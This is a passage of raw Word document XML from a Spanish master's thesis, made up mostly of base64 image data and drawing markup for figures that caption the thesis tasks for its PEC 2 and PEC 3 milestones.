nU3mpdwvQpbmHsM4S4g&#10;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HIMWaYDAAA8CAAADgAAAAAAAAAA&#10;AAAAAAA6AgAAZHJzL2Uyb0RvYy54bWxQSwECLQAKAAAAAAAAACEA+0FRKIb2AACG9gAAFAAAAAAA&#10;AAAAAAAAAAAMBgAAZHJzL21lZGlhL2ltYWdlMS5wbmdQSwECLQAUAAYACAAAACEA9sBmg+AAAAAI&#10;AQAADwAAAAAAAAAAAAAAAADE/AAAZHJzL2Rvd25yZXYueG1sUEsBAi0AFAAGAAgAAAAhAKomDr68&#10;AAAAIQEAABkAAAAAAAAAAAAAAAAA0f0AAGRycy9fcmVscy9lMm9Eb2MueG1sLnJlbHNQSwUGAAAA&#10;AAYABgB8AQAAxP4AAAAA&#10;">
                <v:shape id="Imagen 2" o:spid="_x0000_s1032" type="#_x0000_t75" alt="Escala de tiempo&#10;&#10;Descripción generada automáticamente" style="position:absolute;width:29019;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EMLygAAAOMAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BT8Mw&#10;DIXvSPyHyEjcWNpqAtotmwCBhLjABurZa0xT0Tilybry7/EBiaP9nt/7vN7OvlcTjbELbCBfZKCI&#10;m2A7bg18vD9d3YKKCdliH5gM/FCE7eb8bI2VDSfe0bRPrZIQjhUacCkNldaxceQxLsJALNpnGD0m&#10;GcdW2xFPEu57XWTZtfbYsTQ4HOjBUfO1P3oDu9e3Oj9+13lRezu9PB6su+9LYy4v5rsVqERz+jf/&#10;XT9bwc/L7GZZlEuBlp9kAXrzCwAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAA&#10;AAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAA&#10;FQEAAAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhABgUQwvKAAAA&#10;4wAAAA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD+AgAA&#10;AAA=&#10;">
                  <v:imagedata r:id="rId96" o:title="Escala de tiempo&#10;&#10;Descripción generada automáticamente"/>
                </v:shape>
                <v:shape id="_x0000_s1033" type="#_x0000_t202" style="position:absolute;left:32607;top:7246;width:2734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gbdyAAAAOIAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/PS8Mw&#10;FL4L/g/hCV7EpdWuk7psjKGgXobdLt4ezVtTbV5Kkm71vzeC4PHj+71cT7YXJ/Khc6wgn2UgiBun&#10;O24VHPbPtw8gQkTW2DsmBd8UYL26vFhipd2Z3+lUx1akEA4VKjAxDpWUoTFkMczcQJy4o/MWY4K+&#10;ldrjOYXbXt5lWSktdpwaDA60NdR81aNVsCs+duZmPD69bYp7/3oYt+VnWyt1fTVtHkFEmuK/+M/9&#10;otP8vJiX82KRw++lhEGufgAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAA&#10;AAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUB&#10;AAALAAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQB3BgbdyAAAAOIA&#10;AAAPAAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA/AIAAAAA&#10;" stroked="f">
                  <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="6AAFE74B" w14:textId="63A16DA0" w:rsidR="007B14FB" w:rsidRPr="00437800" w:rsidRDefault="007B14FB" w:rsidP="007B14FB">
                        <w:pPr>
                          <w:pStyle w:val="Descripcin"/>
                          <w:rPr>
                            <w:rFonts w:cs="Arial"/>
                            <w:noProof/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve">Ilustración </w:t>
                        </w:r>
                        <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                          <w:r w:rsidR="00117A4E">
                            <w:rPr>
                              <w:noProof/>
                            </w:rPr>
                            <w:t>5</w:t>
                          </w:r>
                        </w:fldSimple>
                        <w:r>
                          <w:t xml:space="preserve">: </w:t>
                        </w:r>
                        <w:bookmarkStart w:id="18" w:name="_Toc155782572"/>
                        <w:r w:rsidRPr="008C0BDC">
                          <w:t>Tareas relativas a la PEC 2 del TFM.</w:t>
                        </w:r>
                        <w:bookmarkEnd w:id="18"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap type="square" anchorx="margin"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="009F6921" w:rsidRPr="009F6921">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Relativo al reto/PEC 2 se establece el siguiente diagrama.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0986219A" w14:textId="77777777" w:rsidR="00487731" w:rsidRDefault="00487731" w:rsidP="009F6921">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="189576A9" w14:textId="1457DB56" w:rsidR="009F6921" w:rsidRPr="009F6921" w:rsidRDefault="00487731" w:rsidP="009F6921">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251699200" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="51EBD7C6" wp14:editId="51F18A50">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-1905</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>168910</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5951834" cy="1653540"/>
                <wp:effectExtent l="0" t="0" r="0" b="3810"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="387325582" name="Grupo 20"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5951834" cy="1653540"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5952680" cy="1653540"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="873385355" name="Imagen 3" descr="Escala de tiempo&#10;&#10;Descripción generada automáticamente"/>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41295" cy="1653540"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="1339379740" name="Cuadro de texto 1"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3277680" y="733245"/>
                            <a:ext cx="2675000" cy="283845"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:prstClr val="white"/>
                          </a:solidFill>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="228C2F6F" w14:textId="79A95553" w:rsidR="00D54AC2" w:rsidRPr="00A76837" w:rsidRDefault="00D54AC2" w:rsidP="00D54AC2">
                              <w:pPr>
                                <w:pStyle w:val="Descripcin"/>
                                <w:rPr>
                                  <w:rFonts w:cs="Arial"/>
                                  <w:noProof/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve">Ilustración </w:t>
                              </w:r>
                              <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                                <w:r w:rsidR="00117A4E">
                                  <w:rPr>
                                    <w:noProof/>
                                  </w:rPr>
                                  <w:t>6</w:t>
                                </w:r>
                              </w:fldSimple>
                              <w:r>
                                <w:t xml:space="preserve">: </w:t>
                              </w:r>
                              <w:bookmarkStart w:id="19" w:name="_Toc155782573"/>
                              <w:r w:rsidRPr="00B22269">
                                <w:t>Tareas relativas a la PEC 3 del TFM.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1EBD7C6" id="Grupo 20" o:spid="_x0000_s1034" style="position:absolute;left:0;text-align:left;margin-left:-.15pt;margin-top:13.3pt;width:468.65pt;height:130.2pt;z-index:251699200;mso-width-relative:margin" 